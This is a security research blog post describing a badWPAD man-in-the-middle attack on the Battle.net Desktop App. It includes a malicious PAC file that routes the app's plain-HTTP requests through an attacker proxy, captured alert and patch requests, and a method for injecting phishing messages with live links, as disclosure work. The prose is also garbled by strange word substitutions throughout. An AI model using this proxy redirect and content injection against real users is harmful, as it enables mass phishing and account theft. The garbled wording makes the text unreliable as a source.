Brief introduction
In this blog post I would like to describe an example which shows how serious the consequences of a successful badWPAD attack can be. It is not possible to execute a MiTM (man-in-the-middle) attack on encrypted HTTPS communication without accepting a rogue certificate, nevertheless an attacker can modify cleartext HTTP traffic. This attack can be successfully performed in many modern applications which inactive usage plain HTTP protocol for communication, updates etc. 1 specified example is the Battle.net Desktop App used by millions of users around the world. An attacker can change information presented to a victim in many different locations inside the application to execute advanced quality social engineering attacks on a mass scale.
MiTM attack on Battle.net Desktop App
How can this attack be utilized to execute a advanced quality non-email based spear-phishing? I am going to show this in a case survey of Battle.net Desktop App. Many applications are inactive utilizing HTTP protocol, most likely for performance reasons.
Applications like Battle.net Desktop App are actually utilizing WPAD [https://eu.battle.net/support/en/article/23664]. Right after triggering badWPAD attack we will starting receiving requests for a WPAD configuration file:
94.172.124.64 - - [21/Jun/2020:12:31:33 +0200] "GET /wpad.dat HTTP/1.1" 200 4864 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Battle.net/1.22.0.12040 (retail) Chrome/75.0.3770.100 Safari/537.36"
To execute a successful MiTM attack the following WPAD PAC configuration file can be used:
function FindProxyForURL(url, host) {
if(shExpMatch(url, "http://*.battle.net*") || shExpMatch(url, "http://*.blizzard.com*")) { return "PROXY 1.3.3.7:8080; DIRECT"; }
// usage direct for everything else
return "DIRECT";
}
In this example we usage Fiddler as a malicious proxy configured to replace consequence content for requests matching:
http://eu.launcher.battle.net/service/(.*)/pl-pl
Where pl-pl in URL is the Polish language code, so an attacker can adjust phishing message to circumstantial languages.
Battle.net Desktop App is performing requests utilizing unencrypted HTTP protocol:
The message captured above shows up in the desktop application:
This messages can be retrieved utilizing the following commands:
$ curl -is http://eu.launcher.battle.net/service/odin/alert/pl-pl
HTTP/1.1 200 OK
Date: Mon, 29 Jun 2020 11:53:00 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 29 Jun 2020 08:07:15 GMT
ETag: "1d6-5a9348bf472c0"
Accept-Ranges: bytes
Content-Length: 470
Prace konserwacyjne na żywo: wtorek, 30 czerwca, od godz. 05:00 do 07:00. W tym okresie gracze mogą doświadczać rozłączeń, ale ponowne logowanie powinno być możliwe.
Restarty serwerów rozpoczną się w dniu: środa, 1 lipca 03:00 (CEST) do 04:00 (CEST). Ostrzeżenie o nadchodzącym restarcie pojawi się w grze na 15 minut przed jego przeprowadzeniem.
Prosimy śledzić @BlizzardCSEU_PL na Twitterze w celu uzyskania aktualnych informacji o przebiegu prac.
$ curl -is http://eu.launcher.battle.net/service/odin/alert/en-us
HTTP/1.1 200 OK
Date: Mon, 29 Jun 2020 11:53:03 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 29 Jun 2020 08:07:15 GMT
ETag: "179-5a9348bf472c0"
Accept-Ranges: bytes
Content-Length: 377
Live maintenance will be on Tuesday, 30th June from 05:00 until 07:00. During this time, players may experience interruptions of service including disconnects, but should be able to log back in.
Realm restarts will be on Wednesday, 1st July from 03:00 (CEST) until 04:00 (CEST). 15 minutes in-game announcement will be given.
Please follow @BlizzardCSEU_EN on Twitter for updates.
By of changing these HTTP responses we can modify messages showed in Battle.net
desktop application:
This will work for all tabs:
Even before the user is logged into Blizzard account:
An attacker can prepare an arbitrary phishing message specified as “we have detected that your account has been hacked, take immediate action” and lure the user to a Battle.net look-alike phishing website utilizing clickable HTML links that can be utilized in the replaced content.
Another example showing a clickable link in the news window:
Maintenance information:
Please note that links are working in all above mentioned places which can be easy changed by the MiTM proxy. After the users clicks a malicious link it is opened in a default web browser.
That attack could be performed on a large scale by utilizing DNS name devolution [https://blog.redteam.pl/2019/05/sinkholing-badwpad-wpadblock-wpadblocking-com.html], domain name collision [https://blog.redteam.pl/2019/10/internal-domain-name-collision-dns.html] or just LAN MiTM attack based on LLMNR and NBT-NS Windows requests (this works on i.a. Windows 10):
Another script for a successful attack not related strictly to badWPAD is that attacker can attack home routers on a mass scale and replace DNS servers [https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/HomeRouter/HomeRouterSecurity_2020_Bericht.pdf]. Then only for selected hostnames return attacker controlled IP address which will respond with fake content, as there is HTTP traffic and no certificate will be verified on client-side.
Attack like this can be utilized in many different scenarios including spear-phishing or DoS erstwhile utilized in larger scale [https://blog.redteam.pl/2019/05/sinkholing-badwpad-wpadblock-wpadblocking-com.html], for leaking Net-NTLMv2 hashes etc.
An attacker can besides affect the update process:
GET /tpr/bnt001/patch/50/45/504504b7fd0954282978e1bd67984c30 HTTP/1.1
Host: eu.cdn.blizzard.com
Connection: close
HTTP/1.1 200 OK
Date: Sat, 20 Jun 2020 12:33:29 GMT
Content-Type: binary/octet-stream
Content-Length: 1969
Connection: close
Last-Modified: Thu, 18 Jun 2020 21:25:48 GMT
Accept-Ranges: bytes
[...]
Responsible disclosure timeline
- 27 June 2020 – The problem in Battle.net Desktop App was reported to Blizzard support and registered as ticket 72857563.
- 27 June 2020 – The support consequence we received suggested to describe the problem on a public developers forum [https://us.forums.blizzard.com/en/blizzard/c/feedback-discussion/6].
- 27 June 2020 – As there were no public information on where to study safety issues we reached out via Twitter where we can study safety issues and got email address from Blizzard amusement North America client Support [https://twitter.com/BlizzardCS/status/1276864865437716487].
- 28 June 2020 – We described details and e-mailed hacks@blizzard.com
- 05 July 2020 – Sent a reminder email due to no response.
- 10 July 2020 – This blog post was published, which was mentioned in each of our e-mails sent to Blizzard.
